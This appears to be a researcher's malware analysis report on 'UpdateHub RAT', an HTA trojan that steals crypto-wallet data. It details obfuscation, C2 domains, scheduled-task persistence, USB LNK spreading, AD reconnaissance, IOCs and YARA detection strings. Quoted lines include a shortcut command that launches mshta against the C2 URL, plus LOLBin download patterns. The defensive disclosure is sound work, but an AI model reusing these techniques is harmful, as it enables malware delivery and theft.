Announcing “UpdateHub RAT”

1. Executive Summary

This report documents the analysis of a sophisticated HTML Application (HTA) malware sample designed for cryptocurrency wallet theft and corporate network reconnaissance. The malware employs advanced obfuscation techniques, establishes persistence via Windows Task Scheduler, and communicates with command-and-control (C2) infrastructure using custom-encrypted HTTP traffic.

Key Findings:

• Primary targets: Ledger, Trezor, Atomic, Exodus, Guarda, KeepKey, and BitBox02 cryptocurrency wallets

• Extensive Active Directory reconnaissance capabilities indicate corporate environment targeting

• USB spreading functionality via malicious LNK file replacement

• CrowdStrike Falcon detection with execution method modification

• C2 dependency: malware requires live C2 server to execute (anti-analysis)

2. Sample Information

Summary of Sample Information

3. Obfuscation Analysis

The malware employs two XOR-based string decoders to hide operational strings from static analysis.

3.1 Primary Decoder (_dgaily)

Decodes the HTA application configuration used to hide the execution window:

Algorithm: XOR with rolling key (index * 137 + 140) & 0xFF

Output: <HTA:APPLICATION BORDER=’none’ SHOWINTASKBAR=’no’ SYSMENU=’no’ WINDOWSTATE=’minimized’>

3.2 Secondary Decoder (_dd7j5a)

Decodes all 271 operational strings including COM objects, WMI queries, file paths, and C2 endpoints.

Algorithm: XOR with rolling key (index * 107 + 218) & 0xFF

4. Command & Control Infrastructure

4.1 C2 Domain Pattern

The malware iterates through 11 C2 domain variants with failover capability:

https://s{i}-updatehub.cc where {i} = 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, (empty)

4.3 Communication Encryption

• Request body encrypted with 6-digit random XOR key prepended to payload

• Custom Base64 encoding with UTF-16LE conversion

• Response uses same XOR + Base64 scheme

• JWT token-based authentication (Authorization: Bearer {jwt})

This RAT won’t continue full execution without reaching and then authenticating with the C2 Server

Without Network Authentication with the C2, the furtherst the execution gets is mshta.exe executing the hta and enumeration of the system, but none of the post intial execution beyond that occurs. I tried setting up a fake C2 that could catch the request from the RAT but I can’t or didnt want to spend the time trying to set up the authentication parameters, and since I have the code, the code review provides all I need.

5. Cryptocurrency Wallet Targeting

The malware specifically checks for the presence of popular cryptocurrency wallet applications:

Detection results are transmitted to C2 via ledger=true/false and wallets=true/false parameters in the registration beacon.

6. Persistence Mechanism

The malware establishes persistence via Windows Task Scheduler, masquerading as a legitimate Google Update task.

6.1 Scheduled Task Configuration

6.2 Task Settings

• StartWhenAvailable: true

• DisallowStartIfOnBatteries: false

• StopIfGoingOnBatteries: falWakeToRun: true

• RunLevel: 1 (Highest) if admin privileges detected

7. Payload Delivery Methods

The malware employs seven different download methods with automatic fallback to ensure payload delivery success:

8. C2 Task Types

The malware supports the following task types received from the C2 server:

9. Anti-Analysis Techniques

9.1 C2 Dependency (Primary Blocker)

The malware requires a live C2 server to execute any malicious functionality. It iterates through all 11 C2 domain variants and exits silently if none respond with ‘success’. This effectively prevents dynamic analysis in isolated environments.

9.2 Self-Deletion

The zonexi() function deletes the HTA file immediately upon execution using Scripting.FileSystemObject.DeleteFile().

Before execution:

.hta file present before execution “a7ef…”

After Executing UpdateHub RAT:

.hta file is removed, self deletion

9.3 Security Product Detection

When CrowdStrike Falcon is detected, the malware modifies its execution method to use a cmd.exe wrapper: cmd.exe /c start “” /b mshta.exe {url}

9.4 Additional Techniques

• Window Hiding: HTA configured with hidden window, plus window.resizeTo(0,0) and window.moveTo(-10000,-10000)

• Silent Failures: All code wrapped in try/catch blocks to swallow errors

• Admin Detection: Checks HKLM\SECURITY access via StdRegProv.GetSecurityDescriptor

• Auto-Close: window.close() called at end of execution

10. USB Spreading Mechanism

Task Type 9 implements USB spreading functionality that targets removable drives.

10.1 Target File Types

.exe, .docx, .pdf, .doc

10.2 Infection Process

1. Enumerate removable drives (USB, external) via WMI Win32_DiskDrive

2. Scan for target file types (depth limited to 2 directories)

3. Hide original files by setting hidden attribute

4. Create .lnk shortcuts with same base name

5. Shortcut executes: cmd.exe /c start “” “.\{original}” & start “” mshta “{C2_URL}”

11. Active Directory Reconnaissance

Task Type 5 triggers comprehensive AD reconnaissance, indicating corporate environment targeting:

11.1 Information Collected

11.2 Enumeration Methods

• WMI: Win32_ComputerSystem, Win32_NTDomain, Win32_Group, Win32_GroupUser

• ADSI: AdsNameSpaces COM object with WinNT:// provider

• Environment: LOGONSERVER variable for DC identification

12. Indicators of Compromise (IOCs)

12.1 Network Indicators

• https://s[1-10]-updatehub.cc (C2 domains)

• https://s-updatehub.cc (C2 domain, no number)

• HTTP POST requests with 6-digit prefix + Base64 encoded body

12.2 File System Indicators

• %userprofile%\*.exe (downloaded payloads)

• %TEMP%\{random9}.txt (command output)

• .lnk files replacing documents on USB drives

12.3 Scheduled Tasks

• GoogleTaskSystem136.0.7023.12{GUID}

• GoogleUpdaterTaskSystem136.1.7023.12{GUID}

12.4 Process Artifacts

• mshta.exe spawning cmd.exe, powershell.exe

• powershell.exe -ep Bypass -nop

• bitsadmin.exe /transfer

• certutil.exe -urlcache

• rundll32.exe for DLL execution

13. MITRE ATT&CK Mapping

14. Detection Recommendations

14.1 Network Detection

1. Block/monitor DNS queries and HTTP traffic to *-updatehub.cc domains

2. Alert on HTTP POST requests with 6-digit numeric prefix in body

3. Monitor for mshta.exe making external HTTP connections

14.2 Endpoint Detection

• Monitor mshta.exe spawning cmd.exe, powershell.exe, or network-related processes

• Alert on scheduled task creation with “Google” in name but non-Google executable paths

• Detect WMI queries to SecurityCenter2 from scripting hosts

• Monitor certutil.exe and bitsadmin.exe used for file downloads

• Alert on mass file attribute changes on removable drives

• Monitor for LNK file creation alongside hidden files on USB drives

14.3 YARA Detection Strings

$hta1 = “HTA:APPLICATION” ascii $sched1 = “Schedule.Service” ascii $sched2 = “GoogleTaskSystem136” ascii $crypto1 = “Ledger Live” ascii $crypto2 = “@trezor” ascii $wmi1 = “SecurityCenter2” ascii $wmi2 = “Win32_NTDomain” ascii $adsi1 = “WinNT://” ascii

15. Attribution

I used Claude to help verify that I could not find an existing matching Malware Family. Critique and Discussion are appreciated! I dont want to falsely believe I’ve found something new and I try to be very data-driven, reach out if you disagree.

UpdateHub HTA RAT — Malware Family Comparison Analysis

Executive Summary

Based on extensive research, the UpdateHub HTA RAT appears to be a previously unreported or newly emerged malware family. While it shares TTPs with several known threats, it has unique characteristics that distinguish it from existing documented campaigns.

Similar Malware Families Identified

1. Aggah Campaign / Gorgon Group (HIGHEST SIMILARITY)

Similarity Score: 75%

Assessment: The infection chain is very similar to Aggah, but UpdateHub uses custom C2 infrastructure instead of legitimate services and has USB worm capabilities not seen in Aggah.

2. Spora / Gamarue / RETADUP (USB WORM COMPONENT)

Similarity Score: 60%

Assessment: The USB worm technique is nearly identical to Spora/Gamarue’s LNK spreading method, suggesting the author copied this proven technique.

3. KimJongRAT / BabyShark (KOREAN APT)

Similarity Score: 55%

Assessment: Similar focus on crypto wallets and HTA infection chain, but KimJongRAT is attributed to North Korean actors with different infrastructure patterns.

4. StilachiRAT (Microsoft-documented)

Similarity Score: 50%

Assessment: Similar crypto-stealing objectives but completely different codebase and delivery mechanism.

5. Nova Stealer / Odyssey Stealer (macOS Focus)

Similarity Score: 40%

Assessment: Different platform but similar targeting of hardware wallet users.

Unique Characteristics of UpdateHub RAT

These features distinguish UpdateHub from known families:

1. C2 Domain Failover Pattern

s10-updatehub.cc → s9-updatehub.cc → … → s-updatehub.cc

This numbered failover pattern is not commonly seen in documented malware.

2. Fake Google Update Task Names

GoogleTaskSystem136.0.7023.12{GUID}
GoogleUpdaterTaskSystem136.1.7023.12{GUID}

The specific version numbers (136.0.7023.12) appear unique to this family.

3. XOR Encoding with Multiplier

var tetorY = v31af8 * 107 + 218 & 255;
coreve769 += String.fromCharCode(testackS[v31af8] ^ tetorY);

This specific XOR pattern with position-based key generation is distinctive.

4. Combined Capabilities

No other documented family combines ALL of:

• HTA-based delivery

• USB LNK worm spreading

• Crypto wallet detection (hardware wallets)

• Extensive AD reconnaissance

• CrowdStrike Falcon evasion

• Custom XOR-encrypted C2 protocol

5. JWT-Based Authentication

The use of JWT tokens for C2 session authentication is relatively sophisticated for HTA-based malware.

Attribution Assessment

Possible Origins:

1. Cybercriminal Operation (Most Likely)

• Financially motivated (crypto wallet focus)

• Uses commodity techniques (copied USB worm code)

• Brazilian C2 infrastructure hint (meusitehostgator.com.br in first sample)

• No nation-state indicators

1. Evolution of Aggah/Gorgon Tools

• Similar infection chain

• Could be same actors with new infrastructure

• Different final payload suggests possible code sharing

1. Commercial Malware-as-a-Service

• Version numbering suggests ongoing development (v3.3)

• Multiple download fallbacks suggest testing

• Task-based modular design

YARA Rule Matching Results

Rules vs Known Families:

The generic rule would also match Aggah and KimJongRAT samples. The detailed rule is specific to UpdateHub and should not false-positive on other families.

Recommendations for Hunting

Search Terms for Existing Intel:

1. VirusTotal Intelligence:
   content:”updatehub” OR content:”GoogleTaskSystem136" OR
   content:”PT30M” AND content:”P3650D” AND content:”Schedule.Service”

2. MalwareBazaar:

• Tag: hta, crypto-stealer, usb-worm

• Signature: Scheduled task with “Google” impersonation

1. MISP/OpenCTI:

• Search for C2: *-updatehub.cc

• Search for similar HWID patterns

1. Passive DNS:

• Query: s?-updatehub.cc (where ? = 0–10)

• Historical resolution data may reveal infrastructure

Conclusion

UpdateHub RAT appears to be a newly documented threat that combines techniques from multiple known malware families:

• Infection chain resembles Aggah campaign

• USB worm copied from Spora/Gamarue techniques

• Crypto targeting similar to modern stealers like KimJongRAT

• Custom C2 protocol with JWT authentication is unique

The malware should be tracked as a distinct family pending discovery of direct code overlaps with known campaigns. The YARA rules provided should help identify related samples in threat intelligence platforms.

References

1. Unit42 — Aggah Campaign Analysis

2. G DATA — Spora Ransomware Worm Analysis

3. Unit42 — KimJongRAT Stealer Variant

4. Microsoft — StilachiRAT Analysis

5. Moonlock — Anti-Ledger Malware Campaign

6. HP Wolf Security — Aggah Campaign Cryptocurrency Stealer

16. Conclusion

This HTA malware represents a professionally developed multi-stage loader and infostealer with the following characteristics:

• Strong Evasion: Multiple download methods, hidden execution, security product detection, C2 dependency

• Corporate Targeting: Extensive AD reconnaissance suggests enterprise environment focus

• Cryptocurrency Focus: Specific wallet detection for theft operations

• Self-Propagation: USB spreading via LNK replacement technique

• Modular Design: Task-based C2 allows flexible payload deployment

The sophistication level and feature set suggest this is likely part of a commercial malware kit or organized threat actor operation targeting both financial (cryptocurrency) and corporate assets. The C2 dependency serves as both an anti-analysis mechanism and a kill switch, preventing execution in isolated analysis environments.